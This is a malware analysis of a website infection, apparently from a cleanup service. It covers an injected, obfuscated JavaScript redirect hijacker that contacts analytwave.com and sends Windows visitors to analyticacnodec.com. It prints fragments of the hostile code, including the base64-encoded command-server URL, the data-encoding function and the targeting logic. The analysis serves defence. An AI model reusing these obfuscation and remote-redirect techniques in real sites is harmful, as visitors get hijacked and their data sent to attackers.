Analyticacnodec.com and Analytwave.com Redirect Malware

The client reported unauthorized redirects from their website to a malicious URL: https://analyticacnodec.com/d3af16CD2ebF1718/. This occurred selectively on Windows-based browsers, with network requests to analytwave.com observed in developer tools. The issue involved injected JavaScript in two site files, leading to intermittent hijacks. Key concerns: visitor data theft, SEO penalties, and potential server compromises.

This is a sophisticated Browser Redirect Malware, classified as a JavaScript-based Redirect Hijacker. It employs obfuscation, dynamic API calls, and conditional logic to redirect users to attacker-controlled domains (e.g., analyticacnodec.com variants). Often part of malvertising or supply-chain attacks, it targets specific environments to evade detection. Key traits include:

• Obfuscation: Heavy use of base64 encoding and layered decoding (e.g., decodeURIComponent(escape(atob(…)))) to conceal C2 (command-and-control) endpoints like https://analytwave.com/api/getUrl.
• Targeted Execution: User agent parsing to activate only on Windows 10/11 with recent Chrome (120-139.x), Edge (120-139.x), or Firefox (130-149.x) versions, likely exploiting browser-specific vulnerabilities or ad networks.
• Dynamic Behavior: Fetches redirect URLs from a remote API, allowing attackers to update payloads (e.g., phishing pages, exploit kits, or ransomware droppers) without altering the injected code.
• Persistence: Stores a “verified” flag in localStorage to avoid repeated redirects on the same device, maintaining stealth.
• Risks: Beyond redirects, it encodes and sends site data (e.g., domain, favicon) to attackers, potentially for reconnaissance or ad fraud. Similar to known campaigns like those involving malvertising redirect chains.

To fully understand this malware, we performed a static analysis and decoding. The code is an asynchronous immediately-invoked function expression (IIFE) designed for browser injection. It begins with base64 decoding of the command-and-control (C2) URL:

let e=decodeURIComponent(escape(atob("aHR0cHM6Ly9hbmFseXRpd2F2ZS5jb20vYXBpL2dldFVybA==")));

Decoded step-by-step: First, atob("aHR0cHM6Ly9hbmFseXRpd2F2ZS5jb20vYXBpL2dldFVybA==") converts the base64 string to “https://analytwave.com/api/getUrl”. Then, escape(...) encodes special characters (with minimal changes here), and decodeURIComponent(...) ensures URL-safety, resulting in the final C2 endpoint. This hides the primary server used for fetching dynamic redirect targets.

Next, there’s a custom encoding function:

function t(e){return btoa(unescape(encodeURIComponent(e)))}

This encodes data by applying encodeURIComponent, unescape, and btoa (base64). It’s used to obfuscate parameters like the current domain and favicon URL before transmission, making it harder to detect exfiltrated data.

The code then parses query parameters from window.location.search into an object. If a “verified” parameter is present, it sets localStorage "verified" to “true”. This acts as a persistence flag, allowing remote control—attackers can append ?verified=1 to bypass checks on compromised sites.

An async fetch function handles communication:

async function i(o=1){...}

It attempts to fetch from the decoded C2 URL. On success, it parses JSON for a .url and appends parameters like /?wsid=${hostname}&domain=${encoded hostname}. If it fails (with basic retry logic), it falls back to a hardcoded endpoint with similar params. This retrieves dynamic redirect URLs (e.g., https://analyticacnodec.com/d3af16CD2ebF1718/), making the malware adaptable to evolving threats.

Finally, user agent checks and execution logic grab the favicon via document.querySelector('link[rel="icon"]') and parse the UA for Windows NT 10.0 and specific browser versions. If not “verified” in localStorage and conditions match, it calls the fetch function to get the redirect URL, appends &link=${encoded favicon} if available, and performs window.location.replace. This selective targeting maximizes success on vulnerable setups while avoiding sandboxes or non-target systems.

Overall, the code’s modularity suggests origins from a malware-as-a-service kit, with analytwave.com serving as a redirector to endpoints like analyticacnodec.com. It combines obfuscation, dynamic fetching, and persistence for effective, hard-to-detect browser-based attacks.

• Full eradication achieved – the site no longer redirects

• Scans report zero threats

• SEO integrity preserved – no blacklisting

• Client gained enhanced security posture, preventing future incidents